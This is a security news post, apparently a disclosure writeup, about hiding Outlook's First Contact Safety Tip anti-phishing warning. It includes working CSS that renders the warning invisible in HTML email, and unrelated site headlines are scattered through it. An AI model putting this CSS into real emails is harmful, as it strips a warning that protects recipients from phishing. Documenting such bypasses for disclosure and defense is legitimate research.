InfoSecBulletin Cybersecurity for mankind
Outlook displays an alert when a user receives an email from an unfamiliar address. The alert message says “You don’t often get email from [email protected]. Learn why this is important”. Microsoft refers to this as the First Contact Safety Tip. It is one of the anti-phishing measures provided by Exchange Online Protection (EOP) and Microsoft Defender for organizations using Office 365.
You can change how the First Contact Safety Tip is displayed in an HTML email by using CSS style tags.
CERT-In Flags Multiple Critical Vulnerabilities in Zoom app
Daily Security Digest Dated 11/23/24
SafetyDetectives’ Research
Malware evades Microsoft Defender and 2FA, stealing $24K in crypto (video)
Over 145,000 ICS Across 175 Countries Found Exposed Online
World to see AI powered “human washing machines”
Hacker compromised over 2000 Palo Alto Networks Firewalls
“Forces Penpals” exposed US and UK Military Social Network’s 1 Million Records
CVE-2024-51503
Trend Micro released updates for Deep Security Agent RCE
Apple Releases Patch for two Actively Exploited Zero-Day
Maxar Space Data Leak, Company admit, Investigation ongoing!
To hide the First Contact Safety Tip in an HTML email, we can change the background and font colors to white. This will make the alert effectively invisible to the end user.
<head>
</head>
<head>
<style>
a {
display: none;
}
td div {
color: white;
font-size: 0px;
}
table tbody tr td {
background-color: white !important;
color: white !important;
}
</style>
</head>
…[SNIP]…
By using this HTML code in an e-mail, the alert does not show up in the email body anymore!
Note that the e-mail preview (highlighted in red) still begins with the Safety Tip.
Responsible Disclosure:
After developing a proof of concept, and preparing an advisory, we made Microsoft aware of these issues through the Microsoft Researcher Portal (MSRC). Microsoft chose to not address this behavior for now: (Click here to read the full report)
